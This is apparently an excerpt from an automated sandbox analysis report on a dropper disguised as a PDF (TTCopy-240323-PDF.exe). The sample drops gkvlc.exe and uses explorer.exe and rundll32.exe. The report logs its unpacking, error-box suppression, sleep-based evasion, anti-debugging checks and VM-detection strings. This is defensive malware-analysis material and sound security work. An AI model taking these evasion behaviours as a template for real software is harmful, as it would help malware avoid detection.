          Source: Binary string: wntdll.pdb source: gkvlc.exe, gkvlc.exe, 00000003.00000003.262507721.0000000000709000.00000004.00000020.00020000.00000000.sdmp, gkvlc.exe, 00000003.00000002.307286924.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, gkvlc.exe, 00000003.00000002.307286924.0000000000B6F000.00000040.00001000.00020000.00000000.sdmp, gkvlc.exe, 00000003.00000003.264860524.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000003.306596206.000000000449C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000002.777446880.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000002.777446880.00000000048EF000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000003.308845671.0000000004633000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdb source: gkvlc.exe, 00000003.00000002.310205098.0000000002640000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: rundll32.pdbGCTL source: gkvlc.exe, 00000003.00000002.310205098.0000000002640000.00000040.10000000.00040000.00000000.sdmp

          Data Obfuscation

          barindex
          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeUnpacked PE file: 3.2.gkvlc.exe.400000.0.unpack .text:ER;.rdata:R;.data:W; vs .text:ER;
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 1_2_00417E86 push cs; iretd 1_2_00417EB0
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_0041AC46 push edi; iretd 3_2_0041AC4C
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_0041AC11 push edx; ret 3_2_0041AC15
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00406DB7 push FFFFFFE4h; retf 3_2_00406F1E
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00401E50 push eax; ret 3_2_00401E52
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00ACD0D1 push ecx; ret 3_2_00ACD0E4
          Source: C:\Users\user\Desktop\TTCopy-240323-PDF.exeFile created: C:\Users\user\AppData\Local\Temp\gkvlc.exeJump to dropped file
          Source: C:\Users\user\Desktop\TTCopy-240323-PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exe TID: 6408Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exe TID: 1848Thread sleep count: 53 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exe TID: 1848Thread sleep time: -106000s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AA6A60 rdtscp 3_2_00AA6A60
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeAPI coverage: 9.4 %
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\TTCopy-240323-PDF.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D74
          Source: C:\Users\user\Desktop\TTCopy-240323-PDF.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,0_2_0040699E
          Source: C:\Users\user\Desktop\TTCopy-240323-PDF.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 1_2_004073C1 FindFirstFileExW,1_2_004073C1
          Source: C:\Users\user\Desktop\TTCopy-240323-PDF.exeAPI call chain: ExitProcess graph end nodegraph_0-3480
          Source: explorer.exe, 00000004.00000003.464442667.000000000684F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.278708937.00000000081DD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000^
          Source: explorer.exe, 00000004.00000000.274605013.0000000006710000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
          Source: explorer.exe, 00000004.00000003.577669217.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.586979862.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.460785999.000000000F51B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.464122992.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.561124226.000000000F529000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllte
          Source: explorer.exe, 00000004.00000003.591768830.0000000008304000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000004.00000003.463521503.00000000082B2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000004.00000003.463521503.0000000008268000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>&
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 1_2_00401820 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00401820
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 1_2_004098BF GetProcessHeap,1_2_004098BF
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AA6A60 rdtscp 3_2_00AA6A60
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 1_2_0040441E mov eax, dword ptr fs:[00000030h]1_2_0040441E
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 1_2_004087B8 mov eax, dword ptr fs:[00000030h]1_2_004087B8
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AB90AF mov eax, dword ptr fs:[00000030h]3_2_00AB90AF
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AA20A0 mov eax, dword ptr fs:[00000030h]3_2_00AA20A0
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AA20A0 mov eax, dword ptr fs:[00000030h]3_2_00AA20A0
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AA20A0 mov eax, dword ptr fs:[00000030h]3_2_00AA20A0
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AA20A0 mov eax, dword ptr fs:[00000030h]3_2_00AA20A0
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AA20A0 mov eax, dword ptr fs:[00000030h]3_2_00AA20A0
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AA20A0 mov eax, dword ptr fs:[00000030h]3_2_00AA20A0
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AAF0BF mov ecx, dword ptr fs:[00000030h]3_2_00AAF0BF
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AAF0BF mov eax, dword ptr fs:[00000030h]3_2_00AAF0BF
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AAF0BF mov eax, dword ptr fs:[00000030h]3_2_00AAF0BF
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A79080 mov eax, dword ptr fs:[00000030h]3_2_00A79080
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AF3884 mov eax, dword ptr fs:[00000030h]3_2_00AF3884
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AF3884 mov eax, dword ptr fs:[00000030h]3_2_00AF3884
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A758EC mov eax, dword ptr fs:[00000030h]3_2_00A758EC
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B0B8D0 mov eax, dword ptr fs:[00000030h]3_2_00B0B8D0
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B0B8D0 mov ecx, dword ptr fs:[00000030h]3_2_00B0B8D0
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B0B8D0 mov eax, dword ptr fs:[00000030h]3_2_00B0B8D0
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B0B8D0 mov eax, dword ptr fs:[00000030h]3_2_00B0B8D0
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B0B8D0 mov eax, dword ptr fs:[00000030h]3_2_00B0B8D0
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B0B8D0 mov eax, dword ptr fs:[00000030h]3_2_00B0B8D0
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A8B02A mov eax, dword ptr fs:[00000030h]3_2_00A8B02A
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A8B02A mov eax, dword ptr fs:[00000030h]3_2_00A8B02A
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A8B02A mov eax, dword ptr fs:[00000030h]3_2_00A8B02A
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A8B02A mov eax, dword ptr fs:[00000030h]3_2_00A8B02A
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AA002D mov eax, dword ptr fs:[00000030h]3_2_00AA002D
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AA002D mov eax, dword ptr fs:[00000030h]3_2_00AA002D
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AA002D mov eax, dword ptr fs:[00000030h]3_2_00AA002D
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AA002D mov eax, dword ptr fs:[00000030h]3_2_00AA002D
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AA002D mov eax, dword ptr fs:[00000030h]3_2_00AA002D
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B44015 mov eax, dword ptr fs:[00000030h]3_2_00B44015
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B44015 mov eax, dword ptr fs:[00000030h]3_2_00B44015
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AF7016 mov eax, dword ptr fs:[00000030h]3_2_00AF7016
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AF7016 mov eax, dword ptr fs:[00000030h]3_2_00AF7016
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AF7016 mov eax, dword ptr fs:[00000030h]3_2_00AF7016
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B32073 mov eax, dword ptr fs:[00000030h]3_2_00B32073
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B41074 mov eax, dword ptr fs:[00000030h]3_2_00B41074
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A90050 mov eax, dword ptr fs:[00000030h]3_2_00A90050
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A90050 mov eax, dword ptr fs:[00000030h]3_2_00A90050
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AF69A6 mov eax, dword ptr fs:[00000030h]3_2_00AF69A6
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AA61A0 mov eax, dword ptr fs:[00000030h]3_2_00AA61A0
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AA61A0 mov eax, dword ptr fs:[00000030h]3_2_00AA61A0
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AF51BE mov eax, dword ptr fs:[00000030h]3_2_00AF51BE
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AF51BE mov eax, dword ptr fs:[00000030h]3_2_00AF51BE
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AF51BE mov eax, dword ptr fs:[00000030h]3_2_00AF51BE
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AF51BE mov eax, dword ptr fs:[00000030h]3_2_00AF51BE
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A9C182 mov eax, dword ptr fs:[00000030h]3_2_00A9C182
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AAA185 mov eax, dword ptr fs:[00000030h]3_2_00AAA185
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AA2990 mov eax, dword ptr fs:[00000030h]3_2_00AA2990
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A7B1E1 mov eax, dword ptr fs:[00000030h]3_2_00A7B1E1
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A7B1E1 mov eax, dword ptr fs:[00000030h]3_2_00A7B1E1
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A7B1E1 mov eax, dword ptr fs:[00000030h]3_2_00A7B1E1
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B041E8 mov eax, dword ptr fs:[00000030h]3_2_00B041E8
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A94120 mov eax, dword ptr fs:[00000030h]3_2_00A94120
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A94120 mov eax, dword ptr fs:[00000030h]3_2_00A94120
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A94120 mov eax, dword ptr fs:[00000030h]3_2_00A94120
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A94120 mov eax, dword ptr fs:[00000030h]3_2_00A94120
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A94120 mov ecx, dword ptr fs:[00000030h]3_2_00A94120
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AA513A mov eax, dword ptr fs:[00000030h]3_2_00AA513A
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AA513A mov eax, dword ptr fs:[00000030h]3_2_00AA513A
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A79100 mov eax, dword ptr fs:[00000030h]3_2_00A79100
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A79100 mov eax, dword ptr fs:[00000030h]3_2_00A79100
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A79100 mov eax, dword ptr fs:[00000030h]3_2_00A79100
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A7C962 mov eax, dword ptr fs:[00000030h]3_2_00A7C962
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A7B171 mov eax, dword ptr fs:[00000030h]3_2_00A7B171
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A7B171 mov eax, dword ptr fs:[00000030h]3_2_00A7B171
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A9B944 mov eax, dword ptr fs:[00000030h]3_2_00A9B944
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A9B944 mov eax, dword ptr fs:[00000030h]3_2_00A9B944
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A752A5 mov eax, dword ptr fs:[00000030h]3_2_00A752A5
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A752A5 mov eax, dword ptr fs:[00000030h]3_2_00A752A5
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A752A5 mov eax, dword ptr fs:[00000030h]3_2_00A752A5
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A752A5 mov eax, dword ptr fs:[00000030h]3_2_00A752A5
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A752A5 mov eax, dword ptr fs:[00000030h]3_2_00A752A5
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A8AAB0 mov eax, dword ptr fs:[00000030h]3_2_00A8AAB0
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A8AAB0 mov eax, dword ptr fs:[00000030h]3_2_00A8AAB0
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AAFAB0 mov eax, dword ptr fs:[00000030h]3_2_00AAFAB0
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AAD294 mov eax, dword ptr fs:[00000030h]3_2_00AAD294
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AAD294 mov eax, dword ptr fs:[00000030h]3_2_00AAD294
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AA2AE4 mov eax, dword ptr fs:[00000030h]3_2_00AA2AE4
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AA2ACB mov eax, dword ptr fs:[00000030h]3_2_00AA2ACB
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AB4A2C mov eax, dword ptr fs:[00000030h]3_2_00AB4A2C
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AB4A2C mov eax, dword ptr fs:[00000030h]3_2_00AB4A2C
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A88A0A mov eax, dword ptr fs:[00000030h]3_2_00A88A0A
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A7AA16 mov eax, dword ptr fs:[00000030h]3_2_00A7AA16
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A7AA16 mov eax, dword ptr fs:[00000030h]3_2_00A7AA16
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A93A1C mov eax, dword ptr fs:[00000030h]3_2_00A93A1C
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A75210 mov eax, dword ptr fs:[00000030h]3_2_00A75210
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A75210 mov ecx, dword ptr fs:[00000030h]3_2_00A75210
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A75210 mov eax, dword ptr fs:[00000030h]3_2_00A75210
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A75210 mov eax, dword ptr fs:[00000030h]3_2_00A75210
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AB927A mov eax, dword ptr fs:[00000030h]3_2_00AB927A
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B2B260 mov eax, dword ptr fs:[00000030h]3_2_00B2B260
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B2B260 mov eax, dword ptr fs:[00000030h]3_2_00B2B260
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B48A62 mov eax, dword ptr fs:[00000030h]3_2_00B48A62
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B3EA55 mov eax, dword ptr fs:[00000030h]3_2_00B3EA55
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A79240 mov eax, dword ptr fs:[00000030h]3_2_00A79240
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A79240 mov eax, dword ptr fs:[00000030h]3_2_00A79240
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A79240 mov eax, dword ptr fs:[00000030h]3_2_00A79240
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A79240 mov eax, dword ptr fs:[00000030h]3_2_00A79240
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B04257 mov eax, dword ptr fs:[00000030h]3_2_00B04257
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AA4BAD mov eax, dword ptr fs:[00000030h]3_2_00AA4BAD
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AA4BAD mov eax, dword ptr fs:[00000030h]3_2_00AA4BAD
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AA4BAD mov eax, dword ptr fs:[00000030h]3_2_00AA4BAD
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B45BA5 mov eax, dword ptr fs:[00000030h]3_2_00B45BA5
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A81B8F mov eax, dword ptr fs:[00000030h]3_2_00A81B8F
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A81B8F mov eax, dword ptr fs:[00000030h]3_2_00A81B8F
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B2D380 mov ecx, dword ptr fs:[00000030h]3_2_00B2D380
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B3138A mov eax, dword ptr fs:[00000030h]3_2_00B3138A
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AAB390 mov eax, dword ptr fs:[00000030h]3_2_00AAB390
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AA2397 mov eax, dword ptr fs:[00000030h]3_2_00AA2397
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A9DBE9 mov eax, dword ptr fs:[00000030h]3_2_00A9DBE9
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AA03E2 mov eax, dword ptr fs:[00000030h]3_2_00AA03E2
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AA03E2 mov eax, dword ptr fs:[00000030h]3_2_00AA03E2
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AA03E2 mov eax, dword ptr fs:[00000030h]3_2_00AA03E2
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AA03E2 mov eax, dword ptr fs:[00000030h]3_2_00AA03E2
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AA03E2 mov eax, dword ptr fs:[00000030h]3_2_00AA03E2
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AA03E2 mov eax, dword ptr fs:[00000030h]3_2_00AA03E2
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AF53CA mov eax, dword ptr fs:[00000030h]3_2_00AF53CA
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AF53CA mov eax, dword ptr fs:[00000030h]3_2_00AF53CA
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B3131B mov eax, dword ptr fs:[00000030h]3_2_00B3131B
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A7DB60 mov ecx, dword ptr fs:[00000030h]3_2_00A7DB60
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AA3B7A mov eax, dword ptr fs:[00000030h]3_2_00AA3B7A
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AA3B7A mov eax, dword ptr fs:[00000030h]3_2_00AA3B7A
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A7DB40 mov eax, dword ptr fs:[00000030h]3_2_00A7DB40
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B48B58 mov eax, dword ptr fs:[00000030h]3_2_00B48B58
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A7F358 mov eax, dword ptr fs:[00000030h]3_2_00A7F358
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A8849B mov eax, dword ptr fs:[00000030h]3_2_00A8849B
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B314FB mov eax, dword ptr fs:[00000030h]3_2_00B314FB
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AF6CF0 mov eax, dword ptr fs:[00000030h]3_2_00AF6CF0
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AF6CF0 mov eax, dword ptr fs:[00000030h]3_2_00AF6CF0
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AF6CF0 mov eax, dword ptr fs:[00000030h]3_2_00AF6CF0
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B48CD6 mov eax, dword ptr fs:[00000030h]3_2_00B48CD6
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AABC2C mov eax, dword ptr fs:[00000030h]3_2_00AABC2C
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AF6C0A mov eax, dword ptr fs:[00000030h]3_2_00AF6C0A
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AF6C0A mov eax, dword ptr fs:[00000030h]3_2_00AF6C0A
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AF6C0A mov eax, dword ptr fs:[00000030h]3_2_00AF6C0A
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AF6C0A mov eax, dword ptr fs:[00000030h]3_2_00AF6C0A
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B31C06 mov eax, dword ptr fs:[00000030h]3_2_00B31C06
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B31C06 mov eax, dword ptr fs:[00000030h]3_2_00B31C06
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B31C06 mov eax, dword ptr fs:[00000030h]3_2_00B31C06
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B31C06 mov eax, dword ptr fs:[00000030h]3_2_00B31C06
